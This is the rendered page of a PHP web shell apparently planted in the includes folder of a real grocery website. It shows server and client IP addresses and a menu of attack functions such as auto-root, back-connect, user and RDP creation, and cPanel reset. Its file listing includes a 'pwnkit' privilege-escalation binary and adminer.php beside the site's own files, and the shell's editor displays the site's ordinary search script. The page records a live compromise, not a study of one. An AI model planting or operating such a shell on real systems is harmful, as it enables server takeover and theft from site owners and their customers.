Linux server.hostify.co.in 5.14.0-611.49.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Apr 21 16:39:08 EDT 2026 x86_64
Apache
: 162.214.74.213 | : 216.73.217.79
438 Domain
8.2.31
orangegroceries
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
orangegroceries /
public_html /
includes /
[ HOME SHELL ]
Name
Size
Permission
Action
adminer.php
465.43
KB
-rw-r--r--
brands.php
615
B
-rw-r--r--
css.php
1.23
KB
-rw-r--r--
db_config.php
384
B
-rw-r--r--
delete_cart.php
284
B
-rw-r--r--
feature-product.php
2.36
KB
-rw-r--r--
feature-product1.php
7.04
KB
-rw-r--r--
footer.php
3
KB
-rw-r--r--
header.php
6.65
KB
-rw-r--r--
js.php
1.05
KB
-rw-r--r--
orderwhatsapp.php
452
B
-rw-r--r--
product-category.php
1.42
KB
-rw-r--r--
pwnkit
10.99
KB
-rw-r--r--
slider.php
473
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : js.php
<script src="https://orangegroceries.com/js/bootstrap.min.js"></script> <script src="https://orangegroceries.com/js/select2.min.js"></script> <script src="https://orangegroceries.com/js/owl.carousel.js"></script> <script src="https://orangegroceries.com/js/custom.min.js"></script> <script type="text/javascript"> $(document).ready(function(){ $("#martsearch").keyup(function() { var searchbox = $(this).val(); var dataString = 'searchword='+ searchbox; if(searchbox=='') { } else { $.ajax({ type: "POST", url: "https://orangegroceries.com/autosearch.php", data: dataString, cache: false, success: function(html) { $("#display").html(html).show(); } }); }return false; }); }); $(function(){ $('body').on('click', '.datasearch', function(){ var $container = $(this).closest(".container-fluid"); var martsearch = $container.find("#martsearch").val(); // alert(martsearch); var url = "https://orangegroceries.com/item-search.php?martsearch=" + ($container.find("#martsearch").val()) ; window.location.href = url; }); }); </script>
Close